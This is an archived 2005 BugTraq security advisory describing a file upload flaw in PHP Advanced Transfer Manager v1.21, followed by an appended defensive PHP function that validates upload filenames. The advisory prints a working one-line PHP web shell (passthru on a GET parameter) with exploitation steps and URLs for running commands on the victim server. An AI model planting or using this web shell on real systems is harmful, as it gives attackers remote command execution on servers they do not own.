BugTraq
PHP Advanced Transfer Manager v1.21
May 06 2005 08:43AM
tjomi4 gmail com
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888
.88...8888.........888....888
o88o....88.o88oooo888....o888o
********************************
**** Network security team *****
********* nst.void.ru **********
********************************
* Title: PHP Advanced Transfer Manager v1.21
* Bug found by: nst
* Date: 06.05.2005
********************************
Owner: phpatm.free.fr
Google: allintitle:PHP Advanced Transfer Manager
Status: Critical
*** File upload.
1. Register :: http://victim/register.php
2. Login :: http://victim/login.php
Create file:
nst.php.ns
<pre>
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://victim/files/nst.php.ns?nst=ls -la
or
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://victim/files/nst.php.ns?nst=http://your/file.txt
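A defensive counterpart to the report above, added here as an example; it is not phpATM code and not from the advisory's author. It assumes the upload check looked only at the last extension while the web server maps `.php` to the PHP handler wherever it appears in the name (as Apache mod_mime can with multiple extensions); the function name and both extension lists are hypothetical.

```php
<?php
// Added example: hypothetical helper, not part of phpATM.
// Extensions a web server may map to a script handler (assumed list;
// align it with the handlers configured on your server).
const SCRIPT_EXTS = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar',
                     'pl', 'py', 'cgi', 'asp', 'jsp', 'sh', 'shtml', 'htaccess'];
// Extensions the application agrees to store (assumed policy).
const ALLOWED_EXTS = ['txt', 'pdf', 'png', 'jpg', 'gif', 'zip'];

/**
 * Return a server-chosen storage name for an upload, or null when the
 * client-supplied name must be rejected.
 */
function storage_name_for_upload(string $clientName): ?string
{
    // Strip NUL bytes and any directory part (both slash styles).
    $base  = basename(str_replace(["\0", '\\'], ['', '/'], $clientName));
    $parts = explode('.', strtolower($base));
    if (count($parts) < 2 || $parts[0] === '') {
        return null;                 // no extension, or a dotfile such as ".htaccess"
    }
    array_shift($parts);             // every remaining element is an extension segment
    foreach ($parts as $segment) {
        // Check EVERY segment, not just the last: "nst.php.ns" carries "php".
        if (in_array($segment, SCRIPT_EXTS, true)) {
            return null;
        }
    }
    $final = end($parts);
    if (!in_array($final, ALLOWED_EXTS, true)) {
        return null;                 // allowlist on the final extension
    }
    // Never reuse the client name on disk: random stem, one known extension.
    return bin2hex(random_bytes(16)) . '.' . $final;
}

// Constructed sample names, including the one from the report.
foreach (['report.pdf', 'nst.php.ns', 'nst.php', 'photo.PHP.jpg', '.htaccess'] as $name) {
    printf("%-14s => %s\n", $name, storage_name_for_upload($name) ?? 'REJECTED');
}
```

Filename checks are one layer only: the upload directory should also be configured so the server never hands its contents to a script handler.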
Copyright 2009, SecurityFocus